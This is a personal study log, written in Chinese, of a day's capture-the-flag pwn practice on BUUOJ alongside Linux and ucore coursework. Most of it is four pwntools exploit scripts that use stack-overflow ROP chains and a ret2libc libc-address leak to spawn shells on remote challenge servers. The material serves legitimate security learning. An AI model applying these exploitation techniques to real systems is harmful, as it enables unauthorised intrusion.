21.07.14学习总结
Tags: learning experience
05:00-06:10: buuoj刷题
[HarekazeCTF2019]baby_rop: 白给的rop
jarvisoj_level2_x64: 白给的rop, 唯一要注意的就是find -name 找flag
others_shellcode: 连上去直接getshell, 不知道存在的意义是啥
pwn2_sctf_2016: 32位的常规栈题, 复习了一下32位传参, 同时还发现sh在32位好像不能直接getshell至少这题不行, $0的话后面不是\x00也不行, 这题还给了中断, 不知道干嘛的…
09:00-09:30: 继续整Linux私房菜, 看了些基础指令, 学了个man和info(呜呜, 我基础好差)
21:00-21:30: 复习了一下ucore前面写的东西, 然后做练习2的时候Linux出问题了, 明天继续…
21:30-22:20(然后睡着了): buuoj刷题, ciscn_s_3还是蛮有意思的, 纯csu的艺术了属于是
baby_rop:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=process('./babyrop')
sh=remote('node4.buuoj.cn',29498)
elf=ELF('./babyrop')
pop_rdi=0x400683
payload='a'*24+p64(pop_rdi)+p64(0x601048)+p64(elf.plt['system'])
sh.recv()
sh.sendline(payload)
sh.interactive()
jarvisoj_level2_x64:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=remote('node4.buuoj.cn',29241)
elf=ELF('./level2_x64')
payload='w'*136+p64(0x4006b3)+p64(0x600a90)+p64(elf.plt['system'])
sh.recv()
sh.sendline(payload)
sh.interactive()
others_shellcode:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=remote('node4.buuoj.cn',27146)
sh.interactive()
pwn2_sctf_2016:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./pwn2_sctf_2016')
elf=ELF('./pwn2_sctf_2016')
libc=ELF('./libc-2.23.so')
#context.log_level='debug'
sh=remote('node4.buuoj.cn',26341)
vuln=0x804852f
sh.recv()
sh.sendline('-1')
sh.recv()
payload1='w'*48+p32(elf.sym['printf'])+p32(0x80485b8)+p32(0x80486f8)+p32(elf.got['printf'])
sh.sendline(payload1)
sh.recvuntil('said: ')
sh.recvuntil('said: ')
printf_addr=u32(sh.recv(4))
log.success('printf addr: '+hex(printf_addr))
libc_base=-libc.sym['printf']+printf_addr
log.success('libc base: '+hex(libc_base))
sh.recv()
sh.sendline('-1')
pause()
sh.recv()
payload2='w'*48+p32(libc_base+libc.sym['system'])+'wwww'+p32(libc_base+libc.search('/bin/sh').next())
sh.sendline(payload2)
sh.interactive()